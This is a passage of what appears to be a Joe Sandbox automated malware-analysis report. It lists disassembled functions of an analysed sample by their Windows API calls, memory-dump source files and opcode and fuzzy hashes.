                                                                                                                                                            • Part of subcall function 0015D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0015D640
                                                                                                                                                            • Part of subcall function 0015D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 0015D653
                                                                                                                                                            • Part of subcall function 0015D623: GetCurrentThreadId.KERNEL32 ref: 0015D65A
                                                                                                                                                            • Part of subcall function 0015D623: AttachThreadInput.USER32(00000000), ref: 0015D661
                                                                                                                                                          • GetFocus.USER32 ref: 0015D7FB
                                                                                                                                                            • Part of subcall function 0015D66C: GetParent.USER32(?), ref: 0015D67A
                                                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0015D844
                                                                                                                                                          • EnumChildWindows.USER32(?,0015D8BA), ref: 0015D86C
                                                                                                                                                          • __swprintf.LIBCMT ref: 0015D886
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                                          • String ID: %s%d
                                                                                                                                                          • API String ID: 1941087503-1110647743
                                                                                                                                                          • Opcode ID: f481871a2624198544732b49f1884e5f4eeab0a0367af31357bec753fa86a8ae
                                                                                                                                                          • Instruction ID: b9c2f3256460ea09d3aa36b7691149f1580c2562bf7c2d454952bf84c0adbcd1
                                                                                                                                                          • Opcode Fuzzy Hash: f481871a2624198544732b49f1884e5f4eeab0a0367af31357bec753fa86a8ae
                                                                                                                                                          • Instruction Fuzzy Hash: 8611D371600205ABDF21BF60EC86FEA3779AF54705F0040B9FE1DAE186DBB459498B70
                                                                                                                                                          Function 00181836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001818E4
                                                                                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00181917
                                                                                                                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00181A3A
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00181AB0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2364364464-0
                                                                                                                                                          • Opcode ID: d3ea0c918a0ecb8f598bd7c975e75e1630ce00d534e6e74040caa09d00379f40
                                                                                                                                                          • Instruction ID: d287c1c1cb56e8a8c045e6596fe834d2da39e9558e852becf794dd9b945d915c
                                                                                                                                                          • Opcode Fuzzy Hash: d3ea0c918a0ecb8f598bd7c975e75e1630ce00d534e6e74040caa09d00379f40
                                                                                                                                                          • Instruction Fuzzy Hash: 89817471A40214BBDF14EF64C886BAD7BF9AF48720F148459F905AF382D7B4EA418F90
                                                                                                                                                          Function 00180579 Relevance: 7.6, APIs: 5, Instructions: 149libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                          • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 001805DF
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,?,?,?,00000004,00000004,?,?), ref: 0018066E
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,00000000,00000004,00000004,?,?), ref: 0018068C
                                                                                                                                                          • 6CA06DE0.KERNEL32(00000000,?,?,?,00000041,00000004), ref: 001806D2
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000004), ref: 001806EC
                                                                                                                                                            • Part of subcall function 0013F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0016AEA5,?,?,00000000,00000008), ref: 0013F282
                                                                                                                                                            • Part of subcall function 0013F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0016AEA5,?,?,00000000,00000008), ref: 0013F2A6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2773980681-0
                                                                                                                                                          • Opcode ID: 3d2f2ba2ce37a69d51a2cefbf772cc4a567fe44e20c9e4807466d687a7d5145a
                                                                                                                                                          • Instruction ID: ea43d5bd68729c2d07b9a584de2517b428f45e2ba9a010db4fafdcd0d855148a
                                                                                                                                                          • Opcode Fuzzy Hash: 3d2f2ba2ce37a69d51a2cefbf772cc4a567fe44e20c9e4807466d687a7d5145a
                                                                                                                                                          • Instruction Fuzzy Hash: 58518C75A00219DFCB01EFA8D4909ADB7B5FF6C310B158055E946AB352EB30EE55CF90
                                                                                                                                                          Function 0018CB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c8bebf919b5651e318154118bc2602a56b128488e5ee94743b4b9923df7727a0
                                                                                                                                                          • Instruction ID: 02a6312b8940d999af7b00c0ff421a643bc0f30f69fd5cd8c6ed475dd4821a46
                                                                                                                                                          • Opcode Fuzzy Hash: c8bebf919b5651e318154118bc2602a56b128488e5ee94743b4b9923df7727a0
                                                                                                                                                          • Instruction Fuzzy Hash: C641D235900504BFD724EF78DC49FA9BBA9EB0A360F154255F91AA76D1C730AE40DFA0
                                                                                                                                                          Function 00171726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001717D4
                                                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 001717FD
                                                                                                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0017183C
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00171861
                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00171869
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1389676194-0
                                                                                                                                                          • Opcode ID: 4587ad3b5b07adda960aecb7d79b2f9f5788325107080af05915e58b660b848b
                                                                                                                                                          • Instruction ID: 207ccc51b85ec4a0c88a8018eb7131567fe1e160e610eeca96f3035d9147bebc
                                                                                                                                                          • Opcode Fuzzy Hash: 4587ad3b5b07adda960aecb7d79b2f9f5788325107080af05915e58b660b848b
                                                                                                                                                          • Instruction Fuzzy Hash: 2B413A35A00215EFCB01EF64D991AADBBF5FF58310B148099E80AAB362DB31ED51CB51
                                                                                                                                                          Function 0013B736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCursorPos.USER32(000000FF), ref: 0013B749
                                                                                                                                                          • ScreenToClient.USER32(00000000,000000FF), ref: 0013B766
                                                                                                                                                          • GetAsyncKeyState.USER32(00000001), ref: 0013B78B
                                                                                                                                                          • GetAsyncKeyState.USER32(00000002), ref: 0013B799
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4210589936-0
                                                                                                                                                          • Opcode ID: 6b2c65d5454e27a408c1fec2d1ea1cfad2606dcd08acae88de89ea62c3f116be
                                                                                                                                                          • Instruction ID: 98bd381ad692b488eb78bf90c40eaa2b6e65db3cb529b4fb2eb49ea4ab6abbee
                                                                                                                                                          • Opcode Fuzzy Hash: 6b2c65d5454e27a408c1fec2d1ea1cfad2606dcd08acae88de89ea62c3f116be
                                                                                                                                                          • Instruction Fuzzy Hash: 77415D35908619FFDF19DF64C884AEABBB4FB45364F104219F929922D0D730AA90DFA1
                                                                                                                                                          Function 00183C63 Relevance: 7.6, APIs: 5, Instructions: 100registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00183C92
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00183D71
                                                                                                                                                            • Part of subcall function 00183C63: FreeLibrary.KERNEL32(?), ref: 00183D2B
                                                                                                                                                            • Part of subcall function 00183C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00183D4E
                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00183D16
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnumFreeLibrary$Delete
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1943264518-0
                                                                                                                                                          • Opcode ID: 871e6cab7c5792cb3bc659193f361f4efdd1596b1b6b9b6b65e62caf586ca097
                                                                                                                                                          • Instruction ID: ea42c6c0a8ff3b9083f56eaebf262314e0d4979e26709f70a3e273d92b67d006
                                                                                                                                                          • Opcode Fuzzy Hash: 871e6cab7c5792cb3bc659193f361f4efdd1596b1b6b9b6b65e62caf586ca097
                                                                                                                                                          • Instruction Fuzzy Hash: A6313C71901209BFDB15ABD4DC89AFEB7BCEF09300F44016AF522A2550E7709F859F60
                                                                                                                                                          Function 0015C145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0015C156
                                                                                                                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 0015C200
                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0015C208
                                                                                                                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 0015C216
                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0015C21E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3382505437-0
                                                                                                                                                          • Opcode ID: 4482c61c9d0d11d5af529308463b7dacb814a94f8c92ee7756a71f9dd709fe87
                                                                                                                                                          • Instruction ID: d1cf09a9cce7b9c3dbb1570eed69d76b84d4ed83dbc1a7c2ba8638001e5c0981
                                                                                                                                                          • Opcode Fuzzy Hash: 4482c61c9d0d11d5af529308463b7dacb814a94f8c92ee7756a71f9dd709fe87
                                                                                                                                                          • Instruction Fuzzy Hash: F231CE71500619EFDF04CFA8DE8CA9E3BB5EB05316F114228FC35AA1D1C7B09948CB90
                                                                                                                                                          Function 0015E9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 0015E9CD
                                                                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0015E9EA
                                                                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0015EA22
                                                                                                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0015EA48
                                                                                                                                                          • _wcsstr.LIBCMT ref: 0015EA52
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3902887630-0
                                                                                                                                                          • Opcode ID: c507b358f671705eb31155b6ee4d378888d2410cc6769ecb7daac988e3a26f51
                                                                                                                                                          • Instruction ID: 537fd71aea641d6027d7d8a03585547f8d5c4111e52ee9d5ae375be51f5b9037
                                                                                                                                                          • Opcode Fuzzy Hash: c507b358f671705eb31155b6ee4d378888d2410cc6769ecb7daac988e3a26f51
                                                                                                                                                          • Instruction Fuzzy Hash: 93212971604200BAEB1A9B39EC45E7BBBE8DF49750F108029FD0ACF0A1DB70DD808250
                                                                                                                                                          Function 0018DC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0018DCC0
                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0018DCE4
                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0018DCFC
                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 0018DD24
                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0017407D,00000000), ref: 0018DD42
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Long$MetricsSystem
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2294984445-0
                                                                                                                                                          • Opcode ID: 8be1949699e603c7a9aedddc1c2df884769709c17c1d6a9350fbc7d6eaf918dc
                                                                                                                                                          • Instruction ID: ff039492e895766f3d842af431cd0386ca8e3a297682a527cae3038fc8555e16
                                                                                                                                                          • Opcode Fuzzy Hash: 8be1949699e603c7a9aedddc1c2df884769709c17c1d6a9350fbc7d6eaf918dc
                                                                                                                                                          • Instruction Fuzzy Hash: DC21D371604711AFCB246FB9AC88B6937A5FB46374F110728F926C69E0E7709D60CF90
                                                                                                                                                          Function 0015CA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
